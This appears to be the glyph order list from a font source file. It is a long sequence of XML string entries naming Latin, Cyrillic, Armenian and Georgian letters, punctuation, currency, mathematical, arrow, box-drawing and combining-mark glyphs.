<string>Imacron</string> <string>Iogonek</string> <string>Itilde</string> <string>J</string> <string>K</string> <string>uni0136</string> <string>L</string> <string>Lacute</string> <string>Lcaron</string> <string>uni013B</string> <string>Lslash</string> <string>M</string> <string>N</string> <string>Nacute</string> <string>Ncaron</string> <string>uni0145</string> <string>Eng</string> <string>Ntilde</string> <string>O</string> <string>Oacute</string> <string>Ocircumflex</string> <string>Odieresis</string> <string>Ograve</string> <string>Ohorn</string> <string>Ohungarumlaut</string> <string>Omacron</string> <string>Oslash</string> <string>Oslashacute</string> <string>Otilde</string> <string>OE</string> <string>P</string> <string>Thorn</string> <string>Q</string> <string>R</string> <string>Racute</string> <string>Rcaron</string> <string>uni0156</string> <string>S</string> <string>Sacute</string> <string>Scaron</string> <string>Scedilla</string> <string>uni0218</string> <string>T</string> <string>Tbar</string> <string>Tcaron</string> <string>uni021A</string> <string>U</string> <string>Uacute</string> <string>Ucircumflex</string> <string>Udieresis</string> <string>Ugrave</string> <string>Uhorn</string> <string>Uhungarumlaut</string> <string>Umacron</string> <string>Uogonek</string> <string>Uring</string> <string>Utilde</string> <string>V</string> <string>W</string> <string>Wacute</string> <string>Wcircumflex</string> <string>Wdieresis</string> <string>Wgrave</string> <string>X</string> <string>Y</string> <string>Yacute</string> <string>Ycircumflex</string> <string>Ydieresis</string> <string>Ygrave</string> <string>Z</string> <string>Zacute</string> <string>Zcaron</string> <string>Zdotaccent</string> <string>a</string> <string>aacute</string> <string>abreve</string> <string>acircumflex</string> <string>adieresis</string> <string>agrave</string> <string>amacron</string> <string>aogonek</string> <string>aring</string> <string>atilde</string> <string>ae</string> <string>b</string> <string>c</string> <string>cacute</string> <string>ccaron</string> <string>ccedilla</string> <string>cdotaccent</string> <string>d</string> <string>eth</string> <string>dcaron</string> <string>dcroat</string> <string>e</string> <string>eacute</string> <string>ecaron</string> <string>ecircumflex</string> <string>edieresis</string> <string>edotaccent</string> <string>egrave</string> <string>emacron</string> <string>Ebreve</string> <string>ebreve</string> <string>eogonek</string> <string>f</string> <string>g</string> <string>gbreve</string> <string>gcaron</string> <string>uni0123</string> <string>gdotaccent</string> <string>h</string> <string>hbar</string> <string>i</string> <string>dotlessi</string> <string>iacute</string> <string>icircumflex</string> <string>idieresis</string> <string>igrave</string> <string>imacron</string> <string>Ibreve</string> <string>ibreve</string> <string>iogonek</string> <string>itilde</string> <string>j</string> <string>k</string> <string>uni0137</string> <string>l</string> <string>lacute</string> <string>lcaron</string> <string>longs</string> <string>uni013C</string> <string>lslash</string> <string>m</string> <string>n</string> <string>nacute</string> <string>ncaron</string> <string>uni0146</string> <string>eng</string> <string>ntilde</string> <string>o</string> <string>oacute</string> <string>ocircumflex</string> <string>odieresis</string> <string>ograve</string> <string>ohorn</string> <string>ohungarumlaut</string> <string>omacron</string> <string>Obreve</string> <string>obreve</string> <string>oslash</string> <string>oslashacute</string> <string>otilde</string> <string>oe</string> <string>p</string> <string>thorn</string> <string>q</string> <string>r</string> <string>racute</string> <string>rcaron</string> <string>uni0157</string> <string>s</string> <string>sacute</string> <string>scaron</string> <string>scedilla</string> <string>uni0219</string> <string>germandbls</string> <string>t</string> <string>tbar</string> <string>tcaron</string> <string>uni021B</string> <string>u</string> <string>uacute</string> <string>ucircumflex</string> <string>udieresis</string> <string>ugrave</string> <string>uhorn</string> <string>uhungarumlaut</string> <string>umacron</string> <string>uogonek</string> <string>uring</string> <string>utilde</string> <string>v</string> <string>w</string> <string>wacute</string> <string>wcircumflex</string> <string>wdieresis</string> <string>wgrave</string> <string>x</string> <string>y</string> <string>yacute</string> <string>ycircumflex</string> <string>ydieresis</string> <string>ygrave</string> <string>z</string> <string>zacute</string> <string>zcaron</string> <string>zdotaccent</string> <string>ordfeminine</string> <string>ordmasculine</string> <string>uni0410</string> <string>uni0411</string> <string>uni0412</string> <string>uni0413</string> <string>uni0403</string> <string>uni0490</string> <string>uni0414</string> <string>uni0415</string> <string>uni0400</string> <string>uni0401</string> <string>uni0416</string> <string>uni0417</string> <string>uni0418</string> <string>uni0419</string> <string>uni040D</string> <string>uni041A</string> <string>uni040C</string> <string>uni041B</string> <string>uni041C</string> <string>uni041D</string> <string>uni041E</string> <string>uni041F</string> <string>uni0420</string> <string>uni0421</string> <string>uni0422</string> <string>uni0423</string> <string>uni040E</string> <string>uni0424</string> <string>uni0425</string> <string>uni0427</string> <string>uni0426</string> <string>uni0428</string> <string>uni0429</string> <string>uni040F</string> <string>uni042F</string> <string>uni042C</string> <string>uni042A</string> <string>uni042B</string> <string>uni0409</string> <string>uni040A</string> <string>uni0405</string> <string>uni0404</string> <string>uni042D</string> <string>uni0406</string> <string>uni0407</string> <string>uni0408</string> <string>uni040B</string> <string>uni042E</string> <string>uni0402</string> <string>uni0462</string> <string>uni0472</string> <string>uni0492</string> <string>uni0494</string> <string>uni0496</string> <string>uni0498</string> <string>uni049A</string> <string>uni04A2</string> <string>uni04AA</string> <string>uni04AC</string> <string>uni04AE</string> <string>uni04B0</string> <string>uni04B2</string> <string>uni04BA</string> <string>uni04C0</string> <string>uni04C1</string> <string>uni04C3</string> <string>uni04C7</string> <string>uni04CB</string> <string>uni04D0</string> <string>uni04D2</string> <string>uni04D6</string> <string>uni04D8</string> <string>uni04DA</string> <string>uni04DC</string> <string>uni04DE</string> <string>uni04E0</string> <string>uni04E2</string> <string>uni04E4</string> <string>uni04E6</string> <string>uni04E8</string> <string>uni04EA</string> <string>uni04EC</string> <string>uni04EE</string> <string>uni04F0</string> <string>uni04F2</string> <string>uni04F4</string> <string>uni04F6</string> <string>uni04F8</string> <string>uni0510</string> <string>uni051A</string> <string>uni051C</string> <string>uni0430</string> <string>uni0431</string> <string>uni0432</string> <string>uni0433</string> <string>uni0453</string> <string>uni0491</string> <string>uni0434</string> <string>uni0435</string> <string>uni0450</string> <string>uni0451</string> <string>uni0436</string> <string>uni0437</string> <string>uni0438</string> <string>uni0439</string> <string>uni045D</string> <string>uni043A</string> <string>uni045C</string> <string>uni043B</string> <string>uni043C</string> <string>uni043D</string> <string>uni043E</string> <string>uni043F</string> <string>uni0440</string> <string>uni0441</string> <string>uni0442</string> <string>uni0443</string> <string>uni045E</string> <string>uni0444</string> <string>uni0445</string> <string>uni0447</string> <string>uni0446</string> <string>uni0448</string> <string>uni0449</string> <string>uni045F</string> <string>uni044F</string> <string>uni044C</string> <string>uni044A</string> <string>uni044B</string> <string>uni0459</string> <string>uni045A</string> <string>uni0455</string> <string>uni0454</string> <string>uni044D</string> <string>uni0456</string> <string>uni0457</string> <string>uni0458</string> <string>uni045B</string> <string>uni044E</string> <string>uni0452</string> <string>uni0463</string> <string>uni0473</string> <string>uni0493</string> <string>uni0495</string> <string>uni0497</string> <string>uni0499</string> <string>uni049B</string> <string>uni04A3</string> <string>uni04AB</string> <string>uni04AD</string> <string>uni04AF</string> <string>uni04B1</string> <string>uni04B3</string> <string>uni04BB</string> <string>uni04CF</string> <string>uni04C2</string> <string>uni04C4</string> <string>uni04C8</string> <string>uni04CC</string> <string>uni04D1</string> <string>uni04D3</string> <string>uni04D7</string> <string>uni04D9</string> <string>uni04DB</string> <string>uni04DD</string> <string>uni04DF</string> <string>uni04E1</string> <string>uni04E3</string> <string>uni04E5</string> <string>uni04E7</string> <string>uni04E9</string> <string>uni04EB</string> <string>uni04ED</string> <string>uni04EF</string> <string>uni04F1</string> <string>uni04F3</string> <string>uni04F5</string> <string>uni04F7</string> <string>uni04F9</string> <string>uni0511</string> <string>uni051B</string> <string>uni051D</string> <string>uni04A4</string> <string>uni04A5</string> <string>uni04D4</string> <string>uni04D5</string> <string>uni0394</string> <string>uni03F4</string> <string>uni03BC</string> <string>uni0531</string> <string>uni0532</string> <string>uni0533</string> <string>uni0534</string> <string>uni0535</string> <string>uni0536</string> <string>uni0537</string> <string>uni0538</string> <string>uni0539</string> <string>uni053A</string> <string>uni053B</string> <string>uni053C</string> <string>uni053D</string> <string>uni053E</string> <string>uni053F</string> <string>uni0540</string> <string>uni0541</string> <string>uni0542</string> <string>uni0543</string> <string>uni0544</string> <string>uni0545</string> <string>uni0546</string> <string>uni0547</string> <string>uni0548</string> <string>uni0549</string> <string>uni054A</string> <string>uni054B</string> <string>uni054C</string> <string>uni054D</string> <string>uni054E</string> <string>uni054F</string> <string>uni0550</string> <string>uni0551</string> <string>uni0552</string> <string>uni0553</string> <string>uni0554</string> <string>uni0555</string> <string>uni0556</string> <string>uni0561</string> <string>uni0562</string> <string>uni0563</string> <string>uni0564</string> <string>uni0565</string> <string>uni0566</string> <string>uni0567</string> <string>uni0568</string> <string>uni0569</string> <string>uni056A</string> <string>uni056B</string> <string>uni056C</string> <string>uni056D</string> <string>uni056E</string> <string>uni056F</string> <string>uni0570</string> <string>uni0571</string> <string>uni0572</string> <string>uni0573</string> <string>uni0574</string> <string>uni0575</string> <string>uni0576</string> <string>uni0577</string> <string>uni0578</string> <string>uni0579</string> <string>uni057A</string> <string>uni057B</string> <string>uni057C</string> <string>uni057D</string> <string>uni057E</string> <string>uni057F</string> <string>uni0580</string> <string>uni0581</string> <string>uni0582</string> <string>uni0583</string> <string>uni0584</string> <string>uni0585</string> <string>uni0586</string> <string>uni0587</string> <string>uni10D0</string> <string>uni10D1</string> <string>uni10D2</string> <string>uni10D3</string> <string>uni10D4</string> <string>uni10D5</string> <string>uni10D6</string> <string>uni10D7</string> <string>uni10D8</string> <string>uni10D9</string> <string>uni10DA</string> <string>uni10DB</string> <string>uni10DC</string> <string>uni10DD</string> <string>uni10DE</string> <string>uni10DF</string> <string>uni10E0</string> <string>uni10E1</string> <string>uni10E2</string> <string>uni10E3</string> <string>uni10E4</string> <string>uni10E5</string> <string>uni10E6</string> <string>uni10E7</string> <string>uni10E8</string> <string>uni10E9</string> <string>uni10EA</string> <string>uni10EB</string> <string>uni10EC</string> <string>uni10ED</string> <string>uni10EE</string> <string>uni10EF</string> <string>uni10F0</string> <string>uni10F1</string> <string>uni10F2</string> <string>uni10F3</string> <string>uni10F4</string> <string>uni10F5</string> <string>uni10F6</string> <string>uni10F7</string> <string>uni10F8</string> <string>uni10F9</string> <string>uni10FA</string> <string>uni10FC</string> <string>zero</string> <string>one</string> <string>two</string> <string>three</string> <string>four</string> <string>five</string> <string>six</string> <string>seven</string> <string>eight</string> <string>nine</string> <string>fraction</string> <string>uni215F</string> <string>onehalf</string> <string>uni2189</string> <string>uni2153</string> <string>uni2154</string> <string>onequarter</string> <string>threequarters</string> <string>oneeighth</string> <string>threeeighths</string> <string>fiveeighths</string> <string>seveneighths</string> <string>uni00B9</string> <string>uni00B2</string> <string>uni00B3</string> <string>asterisk</string> <string>backslash</string> <string>periodcentered</string> <string>bullet</string> <string>colon</string> <string>comma</string> <string>onedotenleader</string> <string>twodotenleader</string> <string>ellipsis</string> <string>exclam</string> <string>exclamdbl</string> <string>exclamdown</string> <string>numbersign</string> <string>period</string> <string>question</string> <string>uni2047</string> <string>questiondown</string> <string>quotedbl</string> <string>quotesingle</string> <string>semicolon</string> <string>slash</string> <string>underscore</string> <string>underscoredbl</string> <string>uni2016</string> <string>uni2023</string> <string>hyphenationpoint</string> <string>uni203D</string> <string>uni203E</string> <string>uni203F</string> <string>uni2045</string> <string>uni2046</string> <string>uni2048</string> <string>uni2049</string> <string>uni204B</string> <string>uni2E18</string> <string>uni2E1F</string> <string>uni2E2E</string> <string>exclamdown.case</string> <string>uni2E18.case</string> <string>questiondown.case</string> <string>uni208D</string> <string>uni208E</string> <string>braceleft</string> <string>braceright</string> <string>bracketleft</string> <string>bracketright</string> <string>uni2E24</string> <string>uni2E25</string> <string>uni2E22</string> <string>uni2E23</string> <string>parenleft</string> <string>parenright</string> <string>uni207D</string> <string>uni207E</string> <string>uni2768</string> <string>uni2769</string> <string>uni276A</string> <string>uni276B</string> <string>uni276C</string> <string>uni276D</string> <string>uni276E</string> <string>uni276F</string> <string>uni2770</string> <string>uni2771</string> <string>uni2772</string> <string>uni2773</string> <string>uni2774</string> <string>uni2775</string> <string>uni27C5</string> <string>uni27C6</string> <string>uni2987</string> <string>uni2988</string> <string>uni2997</string> <string>uni2998</string> <string>emdash</string> <string>endash</string> <string>figuredash</string> <string>hyphen</string> <string>uni00AD</string> <string>uni2010</string> <string>uni2011</string> <string>uni2015</string> <string>guilsinglleft</string> <string>guilsinglright</string> <string>quotedblbase</string> <string>quotedblleft</string> <string>quotedblright</string> <string>quoteleft</string> <string>quotereversed</string> <string>quoteright</string> <string>quotesinglbase</string> <string>uni201F</string> <string>minute</string> <string>second</string> <string>millisecond</string> <string>uni2035</string> <string>uni2036</string> <string>uni2037</string> <string>uni27E6</string> <string>uni27E7</string> <string>uni27E8</string> <string>uni27E9</string> <string>uni27EA</string> <string>uni27EB</string> <string>uni10FB</string> <string>uni055A</string> <string>uni055B</string> <string>uni055C</string> <string>uni055D</string> <string>uni055E</string> <string>uni055F</string> <string>uni0589</string> <string>uni058A</string> <string>uni205F</string> <string>uni00A0</string> <string>uni2000</string> <string>uni2001</string> <string>uni2002</string> <string>uni2003</string> <string>uni2004</string> <string>uni2005</string> <string>uni2006</string> <string>uni2007</string> <string>uni2008</string> <string>uni2009</string> <string>uni200A</string> <string>uni202F</string> <string>Abreve</string> <string>uniFEFF</string> <string>cent</string> <string>colonmonetary</string> <string>currency</string> <string>dollar</string> <string>dong</string> <string>Euro</string> <string>florin</string> <string>franc</string> <string>lira</string> <string>peseta</string> <string>sterling</string> <string>uni0E3F</string> <string>uni20A0</string> <string>uni20A2</string> <string>uni20A5</string> <string>uni20A6</string> <string>uni20A8</string> <string>uni20A9</string> <string>uni20AA</string> <string>uni20AD</string> <string>uni20AE</string> <string>uni20AF</string> <string>uni20B0</string> <string>uni20B1</string> <string>uni20B2</string> <string>uni20B3</string> <string>uni20B4</string> <string>uni20B5</string> <string>uni20B8</string> <string>uni20B9</string> <string>yen</string> <string>angle</string> <string>approxequal</string> <string>asteriskmath</string> <string>asciitilde</string> <string>circlemultiply</string> <string>circleplus</string> <string>congruent</string> <string>divide</string> <string>dotmath</string> <string>element</string> <string>emptyset</string> <string>equal</string> <string>equivalence</string> <string>existential</string> <string>gradient</string> <string>greater</string> <string>greaterequal</string> <string>infinity</string> <string>integral</string> <string>integralbt</string> <string>integraltp</string> <string>intersection</string> <string>less</string> <string>lessequal</string> <string>logicaland</string> <string>logicalnot</string> <string>logicalor</string> <string>minus</string> <string>multiply</string> <string>notelement</string> <string>notequal</string> <string>notsubset</string> <string>orthogonal</string> <string>partialdiff</string> <string>percent</string> <string>uni27C2</string> <string>perthousand</string> <string>plus</string> <string>plusminus</string> <string>product</string> <string>propersubset</string> <string>propersuperset</string> <string>proportional</string> <string>radical</string> <string>reflexsubset</string> <string>reflexsuperset</string> <string>revlogicalnot</string> <string>similar</string> <string>suchthat</string> <string>summation</string> <string>therefore</string> <string>uni2031</string> <string>uni207A</string> <string>uni207B</string> <string>uni207C</string> <string>uni208A</string> <string>uni208B</string> <string>uni208C</string> <string>uni2126</string> <string>uni2201</string> <string>uni2204</string> <string>uni220A</string> <string>uni220C</string> <string>uni220D</string> <string>uni220E</string> <string>uni2210</string> <string>uni2213</string> <string>uni2218</string> <string>uni221B</string> <string>uni221C</string> <string>uni2223</string> <string>uni222C</string> <string>uni222D</string> <string>uni2235</string> <string>uni2236</string> <string>uni2237</string> <string>uni2238</string> <string>uni2239</string> <string>uni223A</string> <string>uni223B</string> <string>uni223D</string> <string>uni2241</string> <string>uni2242</string> <string>uni2243</string> <string>uni2244</string> <string>uni2246</string> <string>uni2247</string> <string>uni2249</string> <string>uni224A</string> <string>uni224B</string> <string>uni224C</string> <string>uni224D</string> <string>uni224E</string> <string>uni224F</string> <string>uni2250</string> <string>uni2251</string> <string>uni2252</string> <string>uni2253</string> <string>uni2254</string> <string>uni2255</string> <string>uni2256</string> <string>uni2257</string> <string>uni2258</string> <string>uni2259</string> <string>uni225A</string> <string>uni225B</string> <string>uni225C</string> <string>uni225D</string> <string>uni225E</string> <string>uni225F</string> <string>uni2262</string> <string>uni2263</string> <string>uni2266</string> <string>uni2267</string> <string>uni2268</string> <string>uni2269</string> <string>uni226D</string> <string>uni226E</string> <string>uni226F</string> <string>uni2270</string> <string>uni2271</string> <string>uni2272</string> <string>uni2273</string> <string>uni2274</string> <string>uni2275</string> <string>uni2276</string> <string>uni2277</string> <string>uni2278</string> <string>uni2279</string> <string>uni227A</string> <string>uni227B</string> <string>uni227C</string> <string>uni227D</string> <string>uni227E</string> <string>uni227F</string> <string>uni2280</string> <string>uni2281</string> <string>uni2285</string> <string>uni2288</string> <string>uni2289</string> <string>uni228A</string> <string>uni228B</string> <string>uni228D</string> <string>uni228E</string> <string>uni228F</string> <string>uni2290</string> <string>uni2291</string> <string>uni2292</string> <string>uni2293</string> <string>uni2294</string> <string>uni2296</string> <string>uni2298</string> <string>uni2299</string> <string>uni229A</string> <string>uni229B</string> <string>uni229C</string> <string>uni229D</string> <string>uni229E</string> <string>uni229F</string> <string>uni22A0</string> <string>uni22A1</string> <string>uni22A2</string> <string>uni22A3</string> <string>uni22A4</string> <string>uni22B2</string> <string>uni22B3</string> <string>uni22B4</string> <string>uni22B5</string> <string>uni22B8</string> <string>uni22C2</string> <string>uni22C3</string> <string>uni22C4</string> <string>uni22C6</string> <string>uni22CD</string> <string>uni22CE</string> <string>uni22CF</string> <string>uni22D0</string> <string>uni22D1</string> <string>uni22DA</string> <string>uni22DB</string> <string>uni22DC</string> <string>uni22DD</string> <string>uni22DE</string> <string>uni22DF</string> <string>uni22E0</string> <string>uni22E1</string> <string>uni22E2</string> <string>uni22E3</string> <string>uni22E4</string> <string>uni22E5</string> <string>uni22E6</string> <string>uni22E7</string> <string>uni22E8</string> <string>uni22E9</string> <string>uni22EF</string> <string>uni2308</string> <string>uni2309</string> <string>uni230A</string> <string>uni230B</string> <string>uni239B</string> <string>uni239C</string> <string>uni239D</string> <string>uni239E</string> <string>uni239F</string> <string>uni23A0</string> <string>uni23A1</string> <string>uni23A2</string> <string>uni23A3</string> <string>uni23A4</string> <string>uni23A5</string> <string>uni23A6</string> <string>uni23A7</string> <string>uni23A8</string> <string>uni23A9</string> <string>uni23AA</string> <string>uni23AB</string> <string>uni23AC</string> <string>uni23AD</string> <string>uni23AE</string> <string>uni27DC</string> <string>uni27E0</string> <string>uni29EB</string> <string>uni29FA</string> <string>uni29FB</string> <string>uni2A00</string> <string>uni2A2F</string> <string>uni2A6A</string> <string>uni2A6B</string> <string>union</string> <string>universal</string> <string>arrowup</string> <string>uni2197</string> <string>arrowright</string> <string>uni2198</string> <string>arrowdown</string> <string>uni2199</string> <string>arrowleft</string> <string>uni2196</string> <string>arrowboth</string> <string>arrowupdn</string> <string>uni21F5</string> <string>uni219A</string> <string>uni219B</string> <string>uni21F7</string> <string>uni21F8</string> <string>uni21F9</string> <string>uni21FA</string> <string>uni21FB</string> <string>uni21AE</string> <string>uni21FC</string> <string>uni219C</string> <string>uni219D</string> <string>uni21AD</string> <string>uni219E</string> <string>uni219F</string> <string>uni21A0</string> <string>uni21A1</string> <string>uni21A2</string> <string>uni21A3</string> <string>uni21A4</string> <string>uni21A5</string> <string>uni21A6</string> <string>uni21A7</string> <string>arrowupdnbse</string> <string>uni21E4</string> <string>uni21E5</string> <string>uni21B9</string> <string>uni21A9</string> <string>uni21AA</string> <string>uni21AB</string> <string>uni21AC</string> <string>uni21AF</string> <string>uni21B0</string> <string>uni21B1</string> <string>uni21B2</string> <string>uni21B3</string> <string>uni21B4</string> <string>carriagereturn</string> <string>uni21B6</string> <string>uni21B7</string> <string>uni21B8</string> <string>uni21F1</string> <string>uni21F2</string> <string>uni21BA</string> <string>uni21BB</string> <string>uni21BC</string> <string>uni21BD</string> <string>uni21BE</string> <string>uni21BF</string> <string>uni21C0</string> <string>uni21C1</string> <string>uni21C2</string> <string>uni21C3</string> <string>uni21CB</string> <string>uni21CC</string> <string>uni21C4</string> <string>uni21C5</string> <string>uni21C6</string> <string>uni21C8</string> <string>uni21C9</string> <string>uni21CA</string> <string>uni21C7</string> <string>arrowdblup</string> <string>uni21D7</string> <string>arrowdblright</string> <string>uni21D8</string> <string>arrowdbldown</string> <string>uni21D9</string> <string>arrowdblleft</string> <string>uni21D6</string> <string>arrowdblboth</string> <string>uni21D5</string> <string>uni21CD</string> <string>uni21CE</string> <string>uni21CF</string> <string>uni21DA</string> <string>uni21DB</string> <string>uni21DC</string> <string>uni21DD</string> <string>uni21E0</string> <string>uni21E1</string> <string>uni21E2</string> <string>uni21E3</string> <string>uni21E7</string> <string>uni21E8</string> <string>uni21E9</string> <string>uni21E6</string> <string>uni21EB</string> <string>uni21EC</string> <string>uni21ED</string> <string>uni21EE</string> <string>uni21EF</string> <string>uni21F0</string> <string>uni21F3</string> <string>uni21F4</string> <string>uni21F6</string> <string>uni21FD</string> <string>uni21FE</string> <string>uni21FF</string> <string>uni2304</string> <string>uni2794</string> <string>uni2798</string> <string>uni2799</string> <string>uni279A</string> <string>uni279B</string> <string>uni279C</string> <string>uni279D</string> <string>uni279E</string> <string>uni279F</string> <string>uni27A0</string> <string>uni2B06</string> <string>uni2B08</string> <string>uni2B0A</string> <string>uni2B07</string> <string>uni2B0B</string> <string>uni2B05</string> <string>uni2B09</string> <string>uni2B0C</string> <string>uni2B0D</string> <string>uni27A2</string> <string>uni27A3</string> <string>uni27A4</string> <string>uni27A5</string> <string>uni27A6</string> <string>uni27A7</string> <string>uni27A8</string> <string>uni27A9</string> <string>uni27AA</string> <string>uni27AB</string> <string>uni27AC</string> <string>uni27AD</string> <string>uni27AE</string> <string>uni27AF</string> <string>uni27B1</string> <string>uni27B2</string> <string>uni27B3</string> <string>uni27B6</string> <string>uni27B5</string> <string>uni27B4</string> <string>uni27B9</string> <string>uni27B8</string> <string>uni27B7</string> <string>uni27BA</string> <string>uni27BB</string> <string>uni27BC</string> <string>uni27BD</string> <string>uni27BE</string> <string>uni27F5</string> <string>uni27F6</string> <string>uni27F7</string> <string>uni27A1</string> <string>uni2581</string> <string>uni2582</string> <string>uni2583</string> <string>dnblock</string> <string>uni2585</string> <string>uni2586</string> <string>uni2587</string> <string>block</string> <string>upblock</string> <string>uni2594</string> <string>uni258F</string> <string>uni258E</string> <string>uni258D</string> <string>lfblock</string> <string>uni258B</string> <string>uni258A</string> <string>uni2589</string> <string>rtblock</string> <string>uni2595</string> <string>uni2596</string> <string>uni2597</string> <string>uni2598</string> <string>uni2599</string> <string>uni259A</string> <string>uni259B</string> <string>uni259C</string> <string>uni259D</string> <string>uni259E</string> <string>uni259F</string> <string>ltshade</string> <string>shade</string> <string>dkshade</string> <string>uni25CF</string> <string>circle</string> <string>uni25EF</string> <string>uni25D0</string> <string>uni25D1</string> <string>uni25D2</string> <string>uni25D3</string> <string>uni25D6</string> <string>uni25D7</string> <string>uni25D4</string> <string>uni25D5</string> <string>uni25F4</string> <string>uni25F5</string> <string>uni25F6</string> <string>uni25F7</string> <string>uni25CD</string> <string>uni25CC</string> <string>uni25C9</string> <string>uni25CE</string> <string>openbullet</string> <string>invbullet</string> <string>invcircle</string> <string>uni25DA</string> <string>uni25DB</string> <string>uni25E0</string> <string>uni25E1</string> <string>uni25DC</string> <string>uni25DD</string> <string>uni25DE</string> <string>uni25DF</string> <string>uni25C6</string> <string>uni25C7</string> <string>uni2B16</string> <string>uni2B17</string> <string>uni2B18</string> <string>uni2B19</string> <string>uni25C8</string> <string>uni2756</string> <string>lozenge</string> <string>uni25B0</string> <string>uni25B1</string> <string>uni25AE</string> <string>filledrect</string> <string>uni25AD</string> <string>uni25AF</string> <string>uni250C</string> <string>uni2514</string> <string>uni2510</string> <string>uni2518</string> <string>uni253C</string> <string>uni252C</string> <string>uni2534</string> <string>uni251C</string> <string>uni2524</string> <string>uni2500</string> <string>uni2502</string> <string>uni2561</string> <string>uni2562</string> <string>uni2556</string> <string>uni2555</string> <string>uni2563</string> <string>uni2551</string> <string>uni2557</string> <string>uni255D</string> <string>uni255C</string> <string>uni255B</string> <string>uni255E</string> <string>uni255F</string> <string>uni255A</string> <string>uni2554</string> <string>uni2569</string> <string>uni2566</string> <string>uni2560</string> <string>uni2550</string> <string>uni256C</string> <string>uni2567</string> <string>uni2568</string> <string>uni2564</string> <string>uni2565</string> <string>uni2559</string> <string>uni2558</string> <string>uni2552</string> <string>uni2553</string> <string>uni256B</string> <string>uni256A</string> <string>filledbox</string> <string>uni25A1</string> <string>uni25A2</string> <string>uni25A3</string> <string>uni2B1A</string> <string>uni25A4</string> <string>uni25A5</string> <string>uni25A6</string> <string>uni25A7</string> <string>uni25A8</string> <string>uni25A9</string> <string>uni25AA</string> <string>uni25AB</string> <string>uni25E7</string> <string>uni25E8</string> <string>uni25E9</string> <string>uni25EA</string> <string>uni25EB</string> <string>uni25F0</string> <string>uni25F1</string> <string>uni25F2</string> <string>uni25F3</string> <string>uni25FB</string> <string>uni25FC</string> <string>uni25FD</string> <string>uni25FE</string> <string>triagup</string> <string>uni25B6</string> <string>triagdn</string> <string>uni25C0</string> <string>uni25B3</string> <string>uni25B7</string> <string>uni25BD</string> <string>uni25C1</string> <string>uni25EC</string> <string>uni25ED</string> <string>uni25EE</string> <string>triagrt</string> <string>triaglf</string> <string>uni25BB</string> <string>uni25C5</string> <string>uni25B4</string> <string>uni25B8</string> <string>uni25BE</string> <string>uni25C2</string> <string>uni25B5</string> <string>uni25B9</string> <string>uni25BF</string> <string>uni25C3</string> <string>uni25E5</string> <string>uni25E2</string> <string>uni25E3</string> <string>uni25E4</string> <string>uni25F9</string> <string>uni25FF</string> <string>uni25FA</string> <string>uni25F8</string> <string>uni2501</string> <string>uni2503</string> <string>uni2504</string> <string>uni2505</string> <string>uni2506</string> <string>uni2507</string> <string>uni2508</string> <string>uni2509</string> <string>uni250A</string> <string>uni250B</string> <string>uni250D</string> <string>uni250E</string> <string>uni250F</string> <string>uni2511</string> <string>uni2512</string> <string>uni2513</string> <string>uni2515</string> <string>uni2516</string> <string>uni2517</string> <string>uni2519</string> <string>uni251A</string> <string>uni251B</string> <string>uni251D</string> <string>uni251E</string> <string>uni251F</string> <string>uni2520</string> <string>uni2521</string> <string>uni2522</string> <string>uni2523</string> <string>uni2525</string> <string>uni2526</string> <string>uni2527</string> <string>uni2528</string> <string>uni2529</string> <string>uni252A</string> <string>uni252B</string> <string>uni252D</string> <string>uni252E</string> <string>uni252F</string> <string>uni2530</string> <string>uni2531</string> <string>uni2532</string> <string>uni2533</string> <string>uni2535</string> <string>uni2536</string> <string>uni2537</string> <string>uni2538</string> <string>uni2539</string> <string>uni253A</string> <string>uni253B</string> <string>uni253D</string> <string>uni253E</string> <string>uni253F</string> <string>uni2540</string> <string>uni2541</string> <string>uni2542</string> <string>uni2543</string> <string>uni2544</string> <string>uni2545</string> <string>uni2546</string> <string>uni2547</string> <string>uni2548</string> <string>uni2549</string> <string>uni254A</string> <string>uni254B</string> <string>uni254C</string> <string>uni254D</string> <string>uni254E</string> <string>uni254F</string> <string>uni256D</string> <string>uni256E</string> <string>uni256F</string> <string>uni2570</string> <string>uni2571</string> <string>uni2572</string> <string>uni2573</string> <string>uni2574</string> <string>uni2575</string> <string>uni2576</string> <string>uni2577</string> <string>uni2578</string> <string>uni2579</string> <string>uni257A</string> <string>uni257B</string> <string>uni257C</string> <string>uni257D</string> <string>uni257E</string> <string>uni257F</string> <string>bar</string> <string>brokenbar</string> <string>at</string> <string>ampersand</string> <string>paragraph</string> <string>copyright</string> <string>registered</string> <string>section</string> <string>trademark</string> <string>degree</string> <string>asciicircum</string> <string>dagger</string> <string>daggerdbl</string> <string>acutecomb</string> <string>dotbelowcomb</string> <string>gravecomb</string> <string>hookabovecomb</string> <string>tildecomb</string> <string>uni0302</string> <string>uni0304</string> <string>uni0305</string> <string>uni0306</string> <string>uni0307</string> <string>uni0308</string> <string>uni030A</string> <string>uni030B</string> <string>uni030C</string> <string>uni030D</string> <string>uni030E</string> <string>uni030F</string> <string>uni0310</string> <string>uni0311</string> <string>uni0312</string> <string>uni0313</string> <string>uni0314</string> <string>uni0315</string> <string>uni0316</string> <string>uni0317</string> <string>uni0318</string> <string>uni0319</string> <string>uni031A</string> <string>uni031B</string> <string>uni031C</string> <string>uni031D</string> <string>uni031E</string> <string>uni031F</string> <string>uni0320</string> <string>uni0321</string> <string>uni0322</string> <string>uni0324</string> <string>uni0325</string> <string>uni0326</string> <string>uni0327</string> <string>uni0328</string> <string>uni0329</string> <string>uni032A</string> <string>uni032B</string> <string>uni032C</string> <string>uni032D</string> <string>uni032E</string> <string>uni032F</string> <string>uni0330</string> <string>uni0331</string> <string>uni0332</string> <string>uni0333</string> <string>uni0334</string> <string>uni0335</string> <string>uni0336</string> <string>uni0337</string> <string>uni0338</string> <string>uni0339</string> <string>uni033A</string> <string>uni033B</string> <string>uni033C</string> <string>uni033D</string> <string>uni033E</string> <string>uni033F</string> <string>uni0358</string> <string>uni0361</string> <string>uni0306.case</string> <string>uni0311.case</string> <string>uni030F.case</string> <string>uni0307.case</string> <string>uni030B.case</string> <string>uni0304.case</string> <string>uni02B9</string> <string>uni02BB</string> <string>uni02BC</string> <string>uni02BD</string> <string>uni02BE</string> <string>uni02BF</string> <string>uni02C0</string> <string>uni02C1</string> <string>uni02C8</string> <string>uni02C9</string> <string>uni02CC</string> <string>uni02CD</string> <string>uni02CE</string> <string>uni02CF</string> <string>uni02D0</string> <string>uni02D1</string> <string>acute</string> <string>breve</string> <string>caron</string> <string>cedilla</string> <string>circumflex</string> <string>dieresis</string> <string>dotaccent</string> <string>grave</string> <string>hungarumlaut</string> <string>macron</string> <string>ogonek</string> <string>ring</string> <string>tilde</string> <string>uni0559</string> <string>uni2C7D</string> <string>A</string> <string>c6459</string> <string>c6460</string> 